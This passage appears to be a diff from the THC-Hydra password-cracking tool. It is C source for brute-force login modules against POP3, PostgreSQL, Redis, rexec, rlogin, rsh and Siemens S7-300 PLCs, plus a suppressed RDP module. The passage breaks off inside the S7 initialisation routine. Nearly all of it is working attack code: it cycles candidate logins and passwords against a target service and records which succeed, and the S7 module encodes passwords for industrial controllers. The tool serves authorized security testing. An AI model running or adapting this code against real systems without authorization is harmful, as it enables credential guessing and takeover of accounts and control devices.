if (buf[0] != '+') {
hydra_report(stderr, "[ERROR] TLS negotiation failed, no answer received from STARTTLS request\n");
} else {
free(buf);
if ((hydra_connect_to_ssl(sock) == -1)) {
if (verbose)
hydra_report(stderr, "[ERROR] Can't use TLS\n");
p->disable_tls = 1;
} else {
if (verbose)
hydra_report(stderr, "[VERBOSE] TLS connection done\n");
}
}
}
#endif
next_run = 2;
break;
case 2: /* run the cracking function */
next_run = start_pop3(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
case 4: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(2);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
int service_pop3_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int myport = PORT_POP3, mysslport = PORT_POP3_SSL;
char *ptr = NULL;
int sock = -1;
char *capa_str = "CAPA\r\n";
char *quit_str = "QUIT\r\n";
pool p;
p.pop3_auth_mechanism = AUTH_CLEAR;
p.disable_tls = 1;
memcpy(p.ip, ip, 36);
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(300000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(p.ip, myport);
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(p.ip, mysslport);
}
if (sock < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] pid %d terminating, can not connect\n", (int) getpid());
return -1;
}
buf = hydra_receive_line(sock);
if (buf == NULL || buf[0] != '+') { /* check the first line */
if (verbose || debug)
hydra_report(stderr, "[ERROR] Not an POP3 protocol or service shutdown: %s\n", buf);
return -1;
}
ptr = strstr(buf, "<");
if (ptr != NULL && buf[0] == '+') {
if (ptr[strlen(ptr) - 1] == '\n')
ptr[strlen(ptr) - 1] = 0;
if (ptr[strlen(ptr) - 1] == '\r')
ptr[strlen(ptr) - 1] = 0;
strcpy(apop_challenge, ptr);
}
free(buf);
/* send capability request */
if (hydra_send(sock, capa_str, strlen(capa_str), 0) < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Can not send the CAPABILITY request\n");
return -1;
}
buf = pop3_read_server_capacity(sock);
if (buf == NULL) {
hydra_report(stderr, "[ERROR] No answer from CAPABILITY request\n");
return -1;
}
if ((miscptr != NULL) && (strlen(miscptr) > 0)) {
int i;
for (i = 0; i < strlen(miscptr); i++)
miscptr[i] = (char) toupper((int) miscptr[i]);
if (strstr(miscptr, "TLS") || strstr(miscptr, "SSL")) {
p.disable_tls = 0;
}
}
#ifdef LIBOPENSSL
if (!p.disable_tls) {
/* check for STARTTLS, if available we may have access to more basic auth methods */
if (strstr(buf, "STLS") != NULL) {
hydra_send(sock, "STLS\r\n", strlen("STLS\r\n"), 0);
free(buf);
buf = hydra_receive_line(sock);
if (buf[0] != '+') {
hydra_report(stderr, "[ERROR] TLS negotiation failed, no answer received from STARTTLS request\n");
} else {
free(buf);
if ((hydra_connect_to_ssl(sock) == -1)) {
if (verbose)
hydra_report(stderr, "[ERROR] Can't use TLS\n");
p.disable_tls = 1;
} else {
if (verbose)
hydra_report(stderr, "[VERBOSE] TLS connection done\n");
}
if (!p.disable_tls) {
/* ask again capability request but in TLS mode */
if (hydra_send(sock, capa_str, strlen(capa_str), 0) < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Can not send the CAPABILITY request\n");
return -1;
}
buf = pop3_read_server_capacity(sock);
if (buf == NULL) {
hydra_report(stderr, "[ERROR] No answer from CAPABILITY request\n");
return -1;
}
}
}
} else
hydra_report(stderr, "[ERROR] option to use TLS/SSL failed as it is not supported by the server\n");
}
#endif
if (hydra_send(sock, quit_str, strlen(quit_str), 0) < 0) {
//we dont care if the server is not receiving the quit msg
}
hydra_disconnect(sock);
if (verbose)
hydra_report(stderr, "[VERBOSE] CAPABILITY: %s", buf);
/* example:
+OK Capability list follows:
TOP
LOGIN-DELAY 180
UIDL
USER
SASL PLAIN LOGIN
*/
/* according to rfc 2449:
The POP3 AUTH command [POP-AUTH] permits the use of [SASL]
authentication mechanisms with POP3. The SASL capability
indicates that the AUTH command is available and that it supports
an optional base64 encoded second argument for an initial client
response as described in the SASL specification. The argument to
the SASL capability is a space separated list of SASL mechanisms
which are supported.
*/
/* which mean threre will *always* have a space before the LOGIN auth keyword */
if ((strstr(buf, " LOGIN") == NULL) && (strstr(buf, "NTLM") != NULL)) {
p.pop3_auth_mechanism = AUTH_NTLM;
}
#ifdef LIBOPENSSL
if ((strstr(buf, " LOGIN") == NULL) && (strstr(buf, "DIGEST-MD5") != NULL)) {
p.pop3_auth_mechanism = AUTH_DIGESTMD5;
}
if ((strstr(buf, " LOGIN") == NULL) && (strstr(buf, "CRAM-SHA256") != NULL)) {
p.pop3_auth_mechanism = AUTH_CRAMSHA256;
}
if ((strstr(buf, " LOGIN") == NULL) && (strstr(buf, "CRAM-SHA1") != NULL)) {
p.pop3_auth_mechanism = AUTH_CRAMSHA1;
}
if ((strstr(buf, " LOGIN") == NULL) && (strstr(buf, "CRAM-MD5") != NULL)) {
p.pop3_auth_mechanism = AUTH_CRAMMD5;
}
#endif
if ((strstr(buf, " LOGIN") == NULL) && (strstr(buf, "PLAIN") != NULL)) {
p.pop3_auth_mechanism = AUTH_PLAIN;
}
if (strstr(buf, " LOGIN") != NULL) {
p.pop3_auth_mechanism = AUTH_LOGIN;
}
if (strstr(buf, "SASL") == NULL) {
#ifdef LIBOPENSSL
if (strlen(apop_challenge) == 0) {
p.pop3_auth_mechanism = AUTH_CLEAR;
} else {
p.pop3_auth_mechanism = AUTH_APOP;
}
#else
p.pop3_auth_mechanism = AUTH_CLEAR;
#endif
}
free(buf);
if ((miscptr != NULL) && (strlen(miscptr) > 0)) {
if (strstr(miscptr, "CLEAR"))
p.pop3_auth_mechanism = AUTH_CLEAR;
if (strstr(miscptr, "LOGIN"))
p.pop3_auth_mechanism = AUTH_LOGIN;
if (strstr(miscptr, "PLAIN"))
p.pop3_auth_mechanism = AUTH_PLAIN;
#ifdef LIBOPENSSL
if (strstr(miscptr, "APOP"))
p.pop3_auth_mechanism = AUTH_APOP;
if (strstr(miscptr, "CRAM-MD5"))
p.pop3_auth_mechanism = AUTH_CRAMMD5;
if (strstr(miscptr, "CRAM-SHA1"))
p.pop3_auth_mechanism = AUTH_CRAMSHA1;
if (strstr(miscptr, "CRAM-SHA256"))
p.pop3_auth_mechanism = AUTH_CRAMSHA256;
if (strstr(miscptr, "DIGEST-MD5"))
p.pop3_auth_mechanism = AUTH_DIGESTMD5;
#endif
if (strstr(miscptr, "NTLM"))
p.pop3_auth_mechanism = AUTH_NTLM;
}
if (verbose) {
switch (p.pop3_auth_mechanism) {
case AUTH_CLEAR:
hydra_report(stderr, "[VERBOSE] using POP3 CLEAR LOGIN mechanism\n");
break;
case AUTH_LOGIN:
hydra_report(stderr, "[VERBOSE] using POP3 LOGIN AUTH mechanism\n");
break;
case AUTH_PLAIN:
hydra_report(stderr, "[VERBOSE] using POP3 PLAIN AUTH mechanism\n");
break;
case AUTH_APOP:
#ifdef LIBOPENSSL
if (strlen(apop_challenge) == 0) {
hydra_report(stderr, "[VERBOSE] APOP not supported by server, using clear login\n");
p.pop3_auth_mechanism = AUTH_CLEAR;
} else {
hydra_report(stderr, "[VERBOSE] using POP3 APOP AUTH mechanism\n");
}
#else
p.pop3_auth_mechanism = AUTH_CLEAR;
#endif
break;
#ifdef LIBOPENSSL
case AUTH_CRAMMD5:
hydra_report(stderr, "[VERBOSE] using POP3 CRAM-MD5 AUTH mechanism\n");
break;
case AUTH_CRAMSHA1:
hydra_report(stderr, "[VERBOSE] using POP3 CRAM-SHA1 AUTH mechanism\n");
break;
case AUTH_CRAMSHA256:
hydra_report(stderr, "[VERBOSE] using POP3 CRAM-SHA256 AUTH mechanism\n");
break;
case AUTH_DIGESTMD5:
hydra_report(stderr, "[VERBOSE] using POP3 DIGEST-MD5 AUTH mechanism\n");
break;
#endif
case AUTH_NTLM:
hydra_report(stderr, "[VERBOSE] using POP3 NTLM AUTH mechanism\n");
break;
}
}
if (!plist)
plist = list_create(p);
else
plist = list_insert(p);
return 0;
}

133
hydra-postgres.c Normal file
View file

@ -0,0 +1,133 @@
/*
* PostgresSQL Support - by Diaul (at) devilopers.org
*
*
* 110425 no obvious memleaks found
*/
#include "hydra-mod.h"
#ifndef LIBPOSTGRES
void dummy_postgres() {
printf("\n");
}
#else
#include "libpq-fe.h" // Postgres connection functions
#include <stdio.h>
#define DEFAULT_DB "template1"
extern char *HYDRA_EXIT;
int start_postgres(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass;
char database[256];
char connection_string[1024];
PGconn *pgconn;
if (miscptr)
strncpy(database, miscptr, sizeof(database));
else
strncpy(database, DEFAULT_DB, sizeof(database));
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
/*
* Building the connection string
*/
snprintf(connection_string, sizeof(connection_string), "host = '%s' dbname = '%s' user = '%s' password = '%s' ", hydra_address2string(ip), database, login, pass);
if (verbose)
hydra_report(stderr, "connection string: %s\n", connection_string);
pgconn = PQconnectdb(connection_string);
if (PQstatus(pgconn) == CONNECTION_OK) {
PQfinish(pgconn);
hydra_report_found_host(port, ip, "postgres", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 2;
} else {
PQfinish(pgconn);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
}
return 1;
}
void service_postgres(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_POSTGRES, mysslport = PORT_POSTGRES_SSL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(275000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
case 2:
/*
* Here we start the password cracking process
*/
next_run = start_postgres(sock, ip, port, options, miscptr, fp);
break;
case 3:
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
#endif
int service_postgres_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

3210
hydra-rdp.c Normal file
View file

File diff suppressed because it is too large Load diff

103
hydra-redis.c Normal file
View file

@ -0,0 +1,103 @@
#include "hydra-mod.h"
extern char *HYDRA_EXIT;
char *buf;
int start_redis(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *pass, buffer[510];
char *empty = "";
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
sprintf(buffer, "AUTH %.250s\r\n", pass);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
buf = hydra_receive_line(s);
if (buf[0] == '+') {
hydra_report_found_host(port, ip, "redis", fp);
hydra_completed_pair_found();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
if (verbose > 1)
hydra_report(stderr, "[VERBOSE] Authentication failed for password %s\n", pass);
hydra_completed_pair();
free(buf);
return 1;
}
void service_redis_core(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port, int tls) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_REDIS, mysslport = PORT_REDIS_SSL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
hydra_child_exit(0);
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
usleep(250);
next_run = 2;
break;
case 2: /* run the cracking function */
next_run = start_redis(sock, ip, port, options, miscptr, fp);
break;
case 3: /* error exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(2);
case 4: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
void service_redis(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
service_redis_core(ip, sp, options, miscptr, fp, port, 0);
}
int service_redis_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

110
hydra-rexec.c Normal file
View file

@ -0,0 +1,110 @@
#include "hydra-mod.h"
// no memleaks found on 110425
#define COMMAND "/bin/ls /"
extern char *HYDRA_EXIT;
char *buf;
int start_rexec(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass, buffer[300] = "", buffer2[100], *bptr = buffer2;
int ret;
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
memset(buffer2, 0, sizeof(buffer2));
bptr++;
strcpy(bptr, login);
bptr += 1 + strlen(login);
strcpy(bptr, pass);
bptr += 1 + strlen(pass);
strcpy(bptr, COMMAND);
if (hydra_send(s, buffer2, 4 + strlen(login) + strlen(pass) + strlen(COMMAND), 0) < 0) {
return 1;
}
ret = hydra_recv(s, buffer, sizeof(buffer));
if (ret > 0 && buffer[0] == 0) {
hydra_report_found_host(port, ip, "rexec", fp);
hydra_completed_pair_found();
} else
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
void service_rexec(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_REXEC, mysslport = PORT_REXEC_SSL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
next_run = 0;
switch (run) {
case 1: /* connect and service init function */
{
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(275000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
}
case 2: /* run the cracking function */
next_run = start_rexec(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
int service_rexec_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

149
hydra-rlogin.c Normal file
View file

@ -0,0 +1,149 @@
#include "hydra-mod.h"
/*
RFC 1258
client have to use port from 512 -> 1023 or server is denying the connection
no memleaks found on 110425
*/
#define TERM "vt100/9600"
extern char *HYDRA_EXIT;
char *buf;
int start_rlogin(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass, buffer[300] = "", buffer2[100], *bptr = buffer2;
int ret;
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
memset(buffer2, 0, sizeof(buffer2));
bptr++;
strcpy(bptr, login);
bptr += 1 + strlen(login);
strcpy(bptr, login);
bptr += 1 + strlen(login);
strcpy(bptr, TERM);
if (hydra_send(s, buffer2, 4 + strlen(login) + strlen(login) + strlen(TERM), 0) < 0) {
return 4;
}
ret = hydra_recv(s, buffer, sizeof(buffer));
/* 0x00 is sent but hydra_recv transformed it */
if (strlen(buffer) == 0)
ret = hydra_recv(s, buffer, sizeof(buffer));
if (ret > 0 && (strstr(buffer, "rlogind:") != NULL))
return 1;
if (ret > 0 && (strstr(buffer, "ssword") != NULL)) {
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
sprintf(buffer2, "%s\r", pass);
if (hydra_send(s, buffer2, 1 + strlen(pass), 0) < 0) {
return 1;
}
memset(buffer, 0, sizeof(buffer));
ret = hydra_recv(s, buffer, sizeof(buffer));
if (strcmp(buffer, "\r\n"))
ret = hydra_recv(s, buffer, sizeof(buffer));
}
/* Authentication failure */
if (ret > 0 && (strstr(buffer, "ssword") == NULL)) {
#ifdef HAVE_PCRE
if (!hydra_string_match(buffer, "\\s(failure|incorrect|denied)")) {
#else
/* check for failure and incorrect msg */
if ((strstr(buffer, "ailure") == NULL) && (strstr(buffer, "ncorrect") == NULL) && (strstr(buffer, "denied") == NULL)) {
#endif
hydra_report_found_host(port, ip, "rlogin", fp);
hydra_completed_pair_found();
} else {
hydra_completed_pair();
}
} else {
/* if password is asked a second time, it means the pass we provided is wrong */
hydra_completed_pair();
}
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
void service_rlogin(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_RLOGIN, mysslport = PORT_RLOGIN_SSL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
next_run = 0;
switch (run) {
case 1: /* connect and service init function */
{
/* 512 -> 1023 */
hydra_set_srcport(1023);
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(275000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
}
case 2: /* run the cracking function */
next_run = start_rlogin(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
int service_rlogin_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

122
hydra-rsh.c Normal file
View file

@ -0,0 +1,122 @@
#include "hydra-mod.h"
#define COMMAND "/bin/ls /"
/*
password is not used here, just try to find rsh accounts
you should use -p ''
no memleaks found on 110425
*/
extern char *HYDRA_EXIT;
char *buf;
int start_rsh(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, buffer[300] = "", buffer2[100], *bptr = buffer2;
int ret;
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
memset(buffer2, 0, sizeof(buffer2));
bptr++;
strcpy(bptr, login);
bptr += 1 + strlen(login);
strcpy(bptr, login);
bptr += 1 + strlen(login);
strcpy(bptr, COMMAND);
if (hydra_send(s, buffer2, 4 + strlen(login) + strlen(login) + strlen(COMMAND), 0) < 0) {
return 4;
}
ret = hydra_recv(s, buffer, sizeof(buffer));
/* 0x00 is sent but hydra_recv transformed it */
if (strlen(buffer) == 0)
ret = hydra_recv(s, buffer, sizeof(buffer));
#ifdef HAVE_PCRE
if (ret > 0 && (!hydra_string_match(buffer, "\\s(failure|incorrect|denied)"))) {
#else
if (ret > 0 && (strstr(buffer, "ailure") == NULL) && (strstr(buffer, "ncorrect") == NULL) && (strstr(buffer, "denied") == NULL)) {
#endif
hydra_report_found_host(port, ip, "rsh", fp);
hydra_completed_pair_found();
} else {
hydra_completed_pair();
}
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
void service_rsh(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_RSH, mysslport = PORT_RSH_SSL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
next_run = 0;
switch (run) {
case 1: /* connect and service init function */
{
hydra_set_srcport(1023);
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(275000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
}
case 2: /* run the cracking function */
next_run = start_rsh(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
int service_rsh_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

303
hydra-s7-300.c Normal file
View file

@ -0,0 +1,303 @@
// submitted by Alexander Timorin <ATimorin@ptsecurity.com> and Sergey Gordeychik
#include "hydra-mod.h"
#define S7PASSLEN 8
extern char *HYDRA_EXIT;
unsigned char p_cotp[] =
"\x03\x00\x00\x16\x11\xe0\x00\x00\x00\x17"
"\x00\xc1\x02\x01\x00\xc2\x02\x01\x02\xc0"
"\x01\x0a";
unsigned char p_s7_negotiate_pdu[] =
"\x03\x00\x00\x19\x02\xf0\x80\x32\x01\x00"
"\x00\x02\x00\x00\x08\x00\x00\xf0\x00\x00"
"\x01\x00\x01\x01\xe0";
unsigned char p_s7_read_szl[] =
"\x03\x00\x00\x21\x02\xf0\x80\x32\x07\x00"
"\x00\x03\x00\x00\x08\x00\x08\x00\x01\x12"
"\x04\x11\x44\x01\x00\xff\x09\x00\x04\x01"
"\x32\x00\x04";
unsigned char p_s7_password_request[] =
"\x03\x00\x00\x25\x02\xf0\x80\x32\x07\x00"
"\x00\x00\x00\x00\x08\x00\x0c\x00\x01\x12"
"\x04\x11\x45\x01\x00\xff\x09\x00\x08";
int start_s7_300(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *pass, buffer[1024];
char context[S7PASSLEN + 1];
unsigned char encoded_password[S7PASSLEN];
char *spaces = " ";
int ret = -1;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
// prepare password
memset(context, 0, sizeof(context));
if (strlen(pass) < S7PASSLEN) {
strncpy(context, pass, strlen(pass));
strncat(context, spaces, S7PASSLEN - strlen(pass) );
} else {
strncpy(context, pass, S7PASSLEN);
}
// encode password
encoded_password[0] = context[0] ^ 0x55;
encoded_password[1] = context[1] ^ 0x55;
int i;
for (i = 2; i < S7PASSLEN; i++) {
encoded_password[i] = context[i] ^ encoded_password[i-2] ^ 0x55 ;
}
// send p_cotp and check first 2 bytes of answer
if (hydra_send(s, (char *) p_cotp, 22, 0) < 0)
return 1;
memset(buffer, 0, sizeof(buffer));
ret=hydra_recv_nb(s, buffer, sizeof(buffer));
if (ret <= 0)
return 3;
if (ret > 2 && (buffer[0] != 0x03 && buffer[1] != 0x00) )
return 3;
// send p_s7_negotiate_pdu and check first 2 bytes of answer
if (hydra_send(s, (char *) p_s7_negotiate_pdu, 25, 0) < 0)
return 1;
memset(buffer, 0, sizeof(buffer));
ret=hydra_recv_nb(s, buffer, sizeof(buffer));
if (ret <= 0)
return 3;
if (ret > 2 && (buffer[0] != 0x03 && buffer[1] != 0x00) )
return 3;
// send p_s7_read_szl and check first 2 bytes of answer
if (hydra_send(s, (char *) p_s7_read_szl, 33, 0) < 0)
return 1;
memset(buffer, 0, sizeof(buffer));
ret=hydra_recv_nb(s, buffer, sizeof(buffer));
if (ret <= 0)
return 3;
if (ret > 2 && (buffer[0] != 0x03 && buffer[1] != 0x00) )
return 3;
// so now add encoded_password to p_s7_password_request and send
memset(buffer, 0, sizeof(buffer));
memcpy(buffer, p_s7_password_request, 29);
memcpy(buffer + 29, encoded_password, S7PASSLEN);
if (hydra_send(s, buffer, 29 + S7PASSLEN , 0) < 0)
return 1;
memset(buffer, 0, sizeof(buffer));
ret=hydra_recv_nb(s, buffer, sizeof(buffer));
if (ret <= 0)
return 3;
// now check answer
// 0x0000 - valid password
// 0xd605 - no password
// 0xd602 - wrong password
if (ret > 30 ) {
if (buffer[27] == '\x00' && buffer[28] == '\x00') {
hydra_report_found_host(port, ip, "s7-300", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
return 1;
}
if (buffer[27] == '\xd6' && buffer[28] == '\x05') {
//hydra_report_found_host(port, ip, "s7-300", fp);
hydra_completed_pair_found();
hydra_report(stderr, "[INFO] No password protection enabled\n");
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
return 1;
}
}
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
return 1;
}
void service_s7_300(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int s7port = PORT_S7_300;
if (port != 0)
s7port = port;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
sock = hydra_connect_tcp(ip, s7port);
if (sock < 0) {
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = start_s7_300(sock, ip, s7port, options, miscptr, fp);
sock = hydra_disconnect(sock);
break;
case 2: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(2);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
int service_s7_300_init(char *ip, int sp, unsigned char options, char *miscptr, FILE *fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// 1 skip target without generating an error
// 2 skip target because of protocol problems
// 3 skip target because its unreachable
int sock = -1;
int s7port = PORT_S7_300;
char *empty = "";
char *pass, buffer[1024];
char context[S7PASSLEN + 1];
unsigned char encoded_password[S7PASSLEN];
char *spaces = " ";
int ret = -1;
int i;
if (port != 0)
s7port = port;
if (debug || verbose)
printf("[INFO] Checking authentication setup...\n");
sock = hydra_connect_tcp(ip, s7port);
if (sock < 0) {
hydra_report(stderr, "[ERROR] Can not connect to port %d on the target\n", s7port);
return 2;
}
pass = empty;
// prepare password
memset(context, 0, sizeof(context));
strncat(context, spaces, S7PASSLEN - strlen(pass));
// encode password
encoded_password[0] = context[0] ^ 0x55;
encoded_password[1] = context[1] ^ 0x55;
for (i = 2; i < S7PASSLEN; i++) {
encoded_password[i] = context[i] ^ encoded_password[i-2] ^ 0x55 ;
}
// send p_cotp and check first 2 bytes of answer
if (hydra_send(sock, (char *) p_cotp, 22, 0) < 0) {
fprintf(stderr, "[ERROR] can not send data to service\n");
return 3;
}
memset(buffer, 0, sizeof(buffer));
if ((ret = hydra_recv_nb(sock, buffer, sizeof(buffer))) <= 0) {
fprintf(stderr, "[ERROR] did not received data from the service\n");
return 3;
}
